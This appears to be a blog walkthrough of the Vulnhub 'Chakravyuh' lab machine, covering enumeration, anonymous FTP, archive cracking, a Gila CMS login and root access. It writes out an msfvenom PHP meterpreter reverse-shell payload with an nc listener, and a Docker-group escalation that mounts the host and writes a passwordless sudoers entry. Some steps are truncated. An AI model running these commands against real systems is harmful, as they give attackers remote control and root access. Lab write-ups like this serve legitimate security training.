Vulnhub Chakravyuh Walkthrough

We start scanning the host : nmap –A –T4 –p- –vv

Running dirb

There is an ftp service on port 65530 which allows login using anonymous username

The file we’ve downloaded is password protected

We need to download a python script called to extracts the hash from the file and open it with John

python arjun.7z > hash.txt

The password is family, let’s open the file.

The file contains a hash looks like a 64code we can crack it using base64

gila is a directory name

Running dirb gave us now we login with the email and the password princesa.

After we login there is a File Manager where we can upload a php shell, upload it to the tmp folder

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=4444 -f raw -o shell.php

Now visit the link using also make sure to start Metasploit and start a session, or just open a listening port using nc –lvp 4444

Reading the group file we can see that we in a Docker group, we can escalate from there.

Just write the following commands :

docker run –privileged –interactive –tty –volume /:/host bash

echo “www-data ALL=(ALL) NOPASSWD: ALL” > /host/etc/sudoers.d/foo

Now just read the final.txt

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s